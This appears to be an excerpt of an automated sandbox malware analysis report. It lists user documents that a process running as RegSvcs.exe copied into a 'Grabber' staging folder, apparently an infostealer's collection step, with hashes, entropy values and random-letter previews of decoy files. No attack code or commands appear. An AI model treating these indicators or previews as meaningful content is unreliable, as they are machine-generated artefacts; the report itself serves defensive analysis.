Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\SNIPGPPREP.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	true
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\WSHEJMDVQC.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WSHEJMDVQC.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694142261581685
Encrypted:	false
SSDEEP:	24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
MD5:	E9AA17F314E072EBB015265FB63E77C0
SHA1:	1233B76350B8181FFFC438B62002C02B4AE79000
SHA-256:	F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
SHA-512:	719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
Malicious:	false
Preview:	WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\AQRFEVRTGL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\AQRFEVRTGL.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\BQJUWOYRTO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\BUFZSQPCOH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692335641801684
Encrypted:	false
SSDEEP:	24:zH8U6ceY5aV+Ai0xV38519ItLI1uSTaTtR4kYO9TsrMA7PTOGil5:QlUMHi0xVsrsLcn2hmYA7Pc
MD5:	DEF355B17D73C1495713C5488FCE7339
SHA1:	BECA340E4F9D7795A83636020FCF688DA88FA808
SHA-256:	471A7B08733F8B9E8AB162FE426B75361169906D3DD7564B28B19E4DBA14F328
SHA-512:	E95418C8C9F1A763D004E2572EF9D4379878FDD9D222E4605D7A77ED6D86CC764B68B358A7DFA8ED82749B24ED97FCC81139694A031E9B85032AF6CC1F973F67
Malicious:	false
Preview:	BUFZSQPCOHPBYKALHMHLNSRPRTVPDQBUOCQIUAODIUEKAFQGDJEJWAHUKUUNHNODDXVOYWZMQJTURWDHVUCIFBOWJXTDYGJYMUCANKQYYQDAZPDWHSRGGYVPVGUAROKTZQVZRKBJKUQPVSBXUNUVQUXGDDRCCFXNKCRLUTRGZCDJOZFSITBSODAQBZRACSSJHBZJQSWIDQKMDSFONWLGQGIXRSOSOSXFJYJOURMXKTHTKFPJKNLLIXAXMLRXRNSAITLJNMHURDCGMLBSZZGQUPFGUIAACPLZTRSOAQAAYBEWFKSLEZHQMZKSQNGWWBKCCEEXEFKGZNXXZCVVUCQBYNKOAKNKXZAUNQWYVAHGEZRKCYLJESNPTYNSPXUTDFYXGYZZIQICBFFNUPHHCIBKOGMJGNSDDHJIRRFZCCRFOZGNWZGCDMMSOGVDCESUEEHGPRLMKANOQICCTFXCLZEKAGRGLYLWFGMAGHPKQTDONAQKSFPNLTUUXPEUGETZPBEKMCJNCMHTBKTSCNRNVDHIDSZROKAYGDUISPBLTFVLFSAFKYVLQVJPAVOFSSUSZJNMUYOAKUULNRXBYNACAQEKDHCKCIVUYLXHDFNPCCZGNQLMWIUKMGKTRDESXVITCZNHDZOVZEBRZELODDFSSMCHTFHQMHCXBMKZDOFGFTOYNRJPSRASGBJNFZWJWPLWVHAVKBBVTNIPRUSXAFVYCMDUDJRJPWXFBWBCASKRZICWOFTNARKKQDFROZXDUUROLEJYXUQIETKBJKCQLMILRYABQHMQMPXTIBHFCVWURUXTHWCBAFLDWENGHOTDBECRYJDNCGXVYIOAMIANPSNYYMCPEBELRZLSAHCILCJUWSKZHDCDQPSCITMLNPHLHXANDSONCLLAEXJRKDMXZINBJKHEASISSKRWUYGFHFYXHMNYBHGOHNEUAJQYLOQBNHYGIGKJPTHMVWRDOPYXIXGSHDTONANJGYWXHUW